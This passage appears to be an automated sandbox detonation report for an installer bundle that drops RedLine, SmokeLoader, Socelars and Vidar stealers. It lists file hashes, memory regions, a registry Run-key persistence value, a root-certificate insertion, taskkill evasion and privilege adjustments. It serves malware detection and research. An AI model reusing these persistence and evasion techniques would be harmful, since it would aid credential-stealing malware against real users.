SHA256 7b8d7b971e0505f5ebfd9c726e8435878c6077ce2b235f2f647f7b5c21c2980b
SHA512 85d96a08642d0ef59312c275c33dfdf5db3eb4b3fbfd48ec88d590cf28a2debe86b415d830fa8c3f87386ac788448887aef1b1911728e82a5b778d3f458730df

memory/3268-246-0x000000001AE40000-0x000000001AE42000-memory.dmp

C:\ProgramData\889030.exe

MD5 b1ef16d34497d921e4cd574fff8965e4
SHA1 3b959651330acccd31e5646575c889a3861bdcda
SHA256 3776ad134256d78e535c3fc72e576d91f58f80f26c7e69f0d5cd8f6648a40ef8
SHA512 d033ca7c732cb63cc0557760589372f53aeada5d1eb735aab2072823f2cadd2bdb3ae412682e4f1ab40dd4b805424b9580d9ff46d51a6f123de1e32b84ef11f6

memory/4224-257-0x0000000000530000-0x000000000054B000-memory.dmp

C:\ProgramData\889030.exe

MD5 b1ef16d34497d921e4cd574fff8965e4
SHA1 3b959651330acccd31e5646575c889a3861bdcda
SHA256 3776ad134256d78e535c3fc72e576d91f58f80f26c7e69f0d5cd8f6648a40ef8
SHA512 d033ca7c732cb63cc0557760589372f53aeada5d1eb735aab2072823f2cadd2bdb3ae412682e4f1ab40dd4b805424b9580d9ff46d51a6f123de1e32b84ef11f6

memory/4548-241-0x0000000000000000-mapping.dmp

memory/4224-240-0x0000000000010000-0x0000000000011000-memory.dmp

memory/4960-239-0x0000000007CF0000-0x0000000007CF1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe

MD5 926fbc9261cf783ea941891e0644c0c5
SHA1 d90c0f8a499dcf2a7d5a92c316f2b736d999f7d3
SHA256 bfc101337c0065cd9f844ce03b3db348940a28acd6cbb5e0c0adf230c2850805
SHA512 91b4de74719f538dbe92eec6dcae0f4453adc2626adaee0d1ce705f97ed2fe9d47e6f25f7e692c0383a11a9c6812ca1bcd59274eb71b1de9584a3aefb10da49f

memory/4224-258-0x0000000000560000-0x0000000000561000-memory.dmp

memory/4540-234-0x0000000000400000-0x0000000001788000-memory.dmp

memory/4960-233-0x0000000008150000-0x0000000008151000-memory.dmp

memory/4224-232-0x0000000000000000-mapping.dmp

memory/4960-231-0x00000000017D0000-0x00000000017D4000-memory.dmp

memory/4544-230-0x0000000003490000-0x0000000003561000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-24343.tmp\Sat19ba05e89ea6d406.tmp

MD5 6020849fbca45bc0c69d4d4a0f4b62e7
SHA1 5be83881ec871c4b90b4bf6bb75ab8d50dbfefe9
SHA256 c6c796f0d37e1a80632a295122db834499017b8d07728e0b5dfa6325ed3cab98
SHA512 f4c359a9ebf362b943d10772efe9cfd0a0153c1ff866ffdf1223e16e544dfa2250f67e7a7682d2558761d36efe15c7de1a2c311bc67b162eb77394ef179924eb

memory/3332-227-0x0000000000550000-0x0000000000551000-memory.dmp

memory/3332-221-0x0000000000000000-mapping.dmp

memory/3592-222-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 234fad127f21b6119124e83d9612dc75
SHA1 01de838b449239a5ea356c692f1f36cd0e3a27fd
SHA256 32668075f8c859636cb19de60d5ddc6e4fa1bfbc94eb6504636946d641110876
SHA512 41618ad70dc6296200471ce85be320502425730b84cb3b92f9295725746c024593811c61addc4c15c1a3d51227e50e159bc09c8d75b6029476c5b8afaacba002

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 234fad127f21b6119124e83d9612dc75
SHA1 01de838b449239a5ea356c692f1f36cd0e3a27fd
SHA256 32668075f8c859636cb19de60d5ddc6e4fa1bfbc94eb6504636946d641110876
SHA512 41618ad70dc6296200471ce85be320502425730b84cb3b92f9295725746c024593811c61addc4c15c1a3d51227e50e159bc09c8d75b6029476c5b8afaacba002

memory/4224-267-0x000000001ADB0000-0x000000001ADB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\udptest.exe

MD5 f1cd08ca29a2add76e5b0464750c645b
SHA1 929de2a20f5d82b333f95213c955e90e2e0fc66c
SHA256 0cb33bdee818c06cd3e34b8b3a2a0f4120bd91527ef87406f4086bd2841ef5ec
SHA512 4ae6b8729b1ff8061839c0ba8f5a13ce50e5746fab4ed4fadd2e2aab1a9ad31198ca31d8748d64f7011a361e253b29ca2b4112ad201c670fb38f95b5068c6687

memory/1676-270-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe

MD5 068565654f0bbe81d602e7afa851201d
SHA1 108c21228fedab58d897af46c7bd0e57438ccf3e
SHA256 d55d5c14f6759edcded7cd9ec5d6cc430abc90ebe07224b599a26449d241b73d
SHA512 4bac7eb52e8f40511f462bacce5cb80f8b43d8f76c7331b0908b36a4c372bd483f050d1fff34cff3c5a360fb49ad32869225d0d0eb1097df80d05181646ca68a

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe

MD5 068565654f0bbe81d602e7afa851201d
SHA1 108c21228fedab58d897af46c7bd0e57438ccf3e
SHA256 d55d5c14f6759edcded7cd9ec5d6cc430abc90ebe07224b599a26449d241b73d
SHA512 4bac7eb52e8f40511f462bacce5cb80f8b43d8f76c7331b0908b36a4c372bd483f050d1fff34cff3c5a360fb49ad32869225d0d0eb1097df80d05181646ca68a

memory/4020-272-0x0000000000000000-mapping.dmp

memory/5100-268-0x0000000005550000-0x0000000005551000-memory.dmp

memory/4548-266-0x000000001B680000-0x000000001B682000-memory.dmp

memory/4612-264-0x0000000000000000-mapping.dmp

memory/3424-261-0x00000000080B0000-0x00000000080B1000-memory.dmp

memory/648-259-0x0000000000000000-mapping.dmp

C:\ProgramData\5295645.exe

MD5 0cc851da226b1163d665af9c1bb591d7
SHA1 99c57558c187e6c4800f026267bc876e70e96c9b
SHA256 c53308910a486567cc4fddd515551d63c76b394ff1019e27bb28b01ae4fad43b
SHA512 c32c85fbfa7386245d9b243550e25dc0317868d457104a68b0e01d1e28bf62886130718798e9e445e9e8850c5bfbd8421d647ceb5bac5c41ab275c003406a566

C:\ProgramData\5295645.exe

MD5 0cc851da226b1163d665af9c1bb591d7
SHA1 99c57558c187e6c4800f026267bc876e70e96c9b
SHA256 c53308910a486567cc4fddd515551d63c76b394ff1019e27bb28b01ae4fad43b
SHA512 c32c85fbfa7386245d9b243550e25dc0317868d457104a68b0e01d1e28bf62886130718798e9e445e9e8850c5bfbd8421d647ceb5bac5c41ab275c003406a566

C:\Users\Admin\AppData\Local\Temp\setup_2.exe

MD5 3f85c284c00d521faf86158691fd40c5
SHA1 ee06d5057423f330141ecca668c5c6f9ccf526af
SHA256 28915433217ce96922b912651ae21974beba3a35aab6c228d5e96e296c8925dc
SHA512 0458856a88a11d259595c9c9ec105131c155fffb9c039b492e961b6aaf89ecec4e2d057fd6a2305f55303e777e08346a437dc22741ed288fb84d6d37b814d492

memory/1864-290-0x0000000000A30000-0x0000000000A31000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3002.exe

MD5 e511bb4cf31a2307b6f3445a869bcf31
SHA1 76f5c6e8df733ac13d205d426831ed7672a05349
SHA256 56002017746f61eee8d8e9b5ad2f3cbb119dc99300c5b6d32c1be184d3e25137
SHA512 9c81de34bf3b0eb75405c726d641ef6090054e9be8e0c0ab1bb2ed095e6477ce2fa8996868bf8a77a720b210a76b5f4e1b3b086d7f40449d79498681b367199c

memory/4020-297-0x0000000000400000-0x0000000000414000-memory.dmp

memory/756-302-0x000000000041C5E2-mapping.dmp

memory/4304-304-0x0000000000000000-mapping.dmp

memory/1864-309-0x0000000001140000-0x000000000115E000-memory.dmp

memory/2052-315-0x00000000040F7000-0x00000000041F8000-memory.dmp

memory/1312-326-0x0000000005740000-0x0000000005741000-memory.dmp

memory/5000-328-0x00007FF646584060-mapping.dmp

memory/1864-333-0x000000001B680000-0x000000001B682000-memory.dmp

memory/2808-321-0x0000015A769A0000-0x0000015A76A14000-memory.dmp

memory/4108-316-0x0000000000000000-mapping.dmp

memory/2480-319-0x0000000002090000-0x0000000002092000-memory.dmp

memory/1676-337-0x0000000004C00000-0x0000000004C01000-memory.dmp

memory/984-341-0x000001F4D0660000-0x000001F4D06D4000-memory.dmp

memory/1312-308-0x0000000000000000-mapping.dmp

memory/780-311-0x0000000000000000-mapping.dmp

memory/5100-306-0x00000000050E0000-0x00000000050E3000-memory.dmp

memory/5000-345-0x0000021A0FE00000-0x0000021A0FE74000-memory.dmp

memory/756-301-0x0000000000400000-0x0000000000422000-memory.dmp

memory/3824-300-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\is-R01AG.tmp\46807GHF____.exe

MD5 07470f6ad88ca277d3193ccca770d3b3
SHA1 1d323f05cc25310787e87f4fa4557393a05c8c7f
SHA256 b6c1a2841a02de3650633b8516f8ea7c9cfb0dc4ad0b307f6fa4d45ccac7aa19
SHA512 b47582f1230213a2f52f1f55fcb9b4390c52dfc6cc064415f097463bc28f5631962f98dc4fb576935d5304ad1249d28eff869727d1f425feb9821e9b120bcd80

C:\ProgramData\6848594.exe

MD5 068565654f0bbe81d602e7afa851201d
SHA1 108c21228fedab58d897af46c7bd0e57438ccf3e
SHA256 d55d5c14f6759edcded7cd9ec5d6cc430abc90ebe07224b599a26449d241b73d
SHA512 4bac7eb52e8f40511f462bacce5cb80f8b43d8f76c7331b0908b36a4c372bd483f050d1fff34cff3c5a360fb49ad32869225d0d0eb1097df80d05181646ca68a

memory/5100-289-0x0000000005110000-0x000000000560E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-R01AG.tmp\46807GHF____.exe

MD5 07470f6ad88ca277d3193ccca770d3b3
SHA1 1d323f05cc25310787e87f4fa4557393a05c8c7f
SHA256 b6c1a2841a02de3650633b8516f8ea7c9cfb0dc4ad0b307f6fa4d45ccac7aa19
SHA512 b47582f1230213a2f52f1f55fcb9b4390c52dfc6cc064415f097463bc28f5631962f98dc4fb576935d5304ad1249d28eff869727d1f425feb9821e9b120bcd80

C:\ProgramData\6848594.exe

MD5 068565654f0bbe81d602e7afa851201d
SHA1 108c21228fedab58d897af46c7bd0e57438ccf3e
SHA256 d55d5c14f6759edcded7cd9ec5d6cc430abc90ebe07224b599a26449d241b73d
SHA512 4bac7eb52e8f40511f462bacce5cb80f8b43d8f76c7331b0908b36a4c372bd483f050d1fff34cff3c5a360fb49ad32869225d0d0eb1097df80d05181646ca68a

memory/2480-287-0x0000000000000000-mapping.dmp

memory/2440-286-0x0000000000000000-mapping.dmp

memory/2612-288-0x0000000000000000-mapping.dmp

memory/5100-285-0x0000000002C50000-0x0000000002C68000-memory.dmp

memory/2360-284-0x0000000000000000-mapping.dmp

memory/2052-347-0x00000000026E0000-0x000000000273F000-memory.dmp

memory/2448-356-0x0000013682560000-0x00000136825D4000-memory.dmp

memory/5252-362-0x0000000000000000-mapping.dmp

memory/2440-365-0x0000000002DA0000-0x0000000002DA1000-memory.dmp

memory/5352-368-0x0000000000000000-mapping.dmp

memory/756-380-0x0000000004CF0000-0x00000000052F6000-memory.dmp

memory/648-377-0x00000000001D0000-0x00000000001FF000-memory.dmp

memory/5352-387-0x00000000001E0000-0x00000000001E1000-memory.dmp

memory/5492-385-0x000000000041C5EE-mapping.dmp

memory/4108-384-0x0000000005810000-0x0000000005811000-memory.dmp

memory/1108-381-0x000002207F220000-0x000002207F294000-memory.dmp

memory/2424-371-0x000001A7CB660000-0x000001A7CB6D4000-memory.dmp

memory/780-367-0x0000000004AD0000-0x0000000004FCE000-memory.dmp

memory/3040-359-0x0000000001340000-0x0000000001355000-memory.dmp

memory/5216-357-0x0000000000000000-mapping.dmp

memory/5144-353-0x0000000000000000-mapping.dmp

memory/2272-352-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2272-342-0x0000000000000000-mapping.dmp

memory/2612-391-0x00000000001E0000-0x00000000001E1000-memory.dmp

memory/5716-395-0x0000000000000000-mapping.dmp

memory/2808-393-0x0000015A76400000-0x0000015A7644D000-memory.dmp

memory/360-392-0x000002C273D50000-0x000002C273DC4000-memory.dmp

memory/5816-399-0x0000000000000000-mapping.dmp

memory/2052-280-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\sqlite.dll

MD5 14ef50a8355a8ddbffbd19aff9936836
SHA1 7c44952baa2433c554228dbd50613d7bf347ada5
SHA256 fde50eea631c01d46cbb95b6f4c2a7c834ce77184552f788242c5811ed76b8f9
SHA512 ccddf7b0610bcae4395a6aae7c32d03f23a40328b68d9f0246361e1af0d401ee444f178310910d15e7dbd3706a89ae4e5b7adbd972e1f50cd5a77515612f76dc

memory/1864-275-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\setup_2.exe

MD5 3f85c284c00d521faf86158691fd40c5
SHA1 ee06d5057423f330141ecca668c5c6f9ccf526af
SHA256 28915433217ce96922b912651ae21974beba3a35aab6c228d5e96e296c8925dc
SHA512 0458856a88a11d259595c9c9ec105131c155fffb9c039b492e961b6aaf89ecec4e2d057fd6a2305f55303e777e08346a437dc22741ed288fb84d6d37b814d492

memory/648-406-0x0000000000400000-0x0000000002B5D000-memory.dmp

memory/1448-404-0x000001E3EEE00000-0x000001E3EEE74000-memory.dmp

memory/5216-408-0x00000000052A0000-0x00000000052A1000-memory.dmp

memory/1924-411-0x000001F8B6960000-0x000001F8B69D4000-memory.dmp

memory/6132-416-0x0000000000000000-mapping.dmp

memory/1268-409-0x0000028093C40000-0x0000028093CB4000-memory.dmp

memory/1260-424-0x000001D844210000-0x000001D844284000-memory.dmp

memory/508-428-0x0000000000000000-mapping.dmp

memory/2676-429-0x000002188B500000-0x000002188B574000-memory.dmp

memory/2652-431-0x00000166E4500000-0x00000166E4574000-memory.dmp

memory/5492-427-0x0000000004CF0000-0x00000000052F6000-memory.dmp

memory/5184-422-0x0000000000000000-mapping.dmp

memory/4612-438-0x0000000002CC0000-0x0000000002E0A000-memory.dmp

memory/3424-440-0x000000007E910000-0x000000007E911000-memory.dmp

memory/5724-449-0x0000000000A9D20B-mapping.dmp

memory/4612-460-0x0000000000400000-0x0000000002B6D000-memory.dmp

memory/4612-461-0x0000000007254000-0x0000000007256000-memory.dmp

memory/5724-465-0x0000000000A90000-0x0000000000AD3000-memory.dmp

memory/5912-464-0x0000000000000000-mapping.dmp

memory/4612-463-0x0000000007250000-0x0000000007251000-memory.dmp

memory/3424-467-0x00000000047A3000-0x00000000047A4000-memory.dmp

memory/4612-470-0x0000000007253000-0x0000000007254000-memory.dmp

memory/6088-471-0x0000000000000000-mapping.dmp

memory/4612-468-0x0000000007252000-0x0000000007253000-memory.dmp

memory/6124-473-0x0000000000000000-mapping.dmp

memory/4956-475-0x0000000000000000-mapping.dmp

memory/5452-477-0x0000000000000000-mapping.dmp

memory/5000-547-0x0000021A0FC90000-0x0000021A0FCAB000-memory.dmp

memory/5000-549-0x0000021A12400000-0x0000021A12506000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2021-09-11 20:41

Reported

2021-09-11 21:12

Platform

win10-en

Max time kernel

33s

Max time network

1458s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe

RedLine

infostealer redline

RedLine Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Socelars

stealer socelars

Socelars Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar

stealer vidar

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat191649b47c9e2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat199ba8a4637dcb034.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19e4750dd01.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19f84b58b3d7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat1946eb84e6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19ba05e89ea6d406.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19c6762a08beae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-SF020.tmp\Sat19ba05e89ea6d406.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-PJJ1J.tmp\46807GHF____.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe N/A
N/A N/A C:\ProgramData\6142391.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe N/A
N/A N/A C:\ProgramData\4221052.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udptest.exe N/A
N/A N/A C:\ProgramData\1464811.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3002.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jhuuee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-ELF00.tmp\setup_2.tmp N/A
N/A N/A C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe N/A
N/A N/A C:\ProgramData\1464811.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_2.exe N/A
N/A N/A \??\c:\windows\system32\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-LLHAC.tmp\setup_2.tmp N/A
N/A N/A C:\ProgramData\2746100.exe N/A
N/A N/A C:\ProgramData\358946.exe N/A
N/A N/A C:\ProgramData\1319964.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3002.exe N/A
N/A N/A C:\ProgramData\7308219.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" C:\ProgramData\4221052.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4548 set thread context of 3268 N/A C:\ProgramData\1464811.exe C:\ProgramData\1464811.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp C:\Windows\SysWOW64\taskkill.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19c6762a08beae.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19c6762a08beae.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19c6762a08beae.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19c6762a08beae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19c6762a08beae.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19c6762a08beae.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
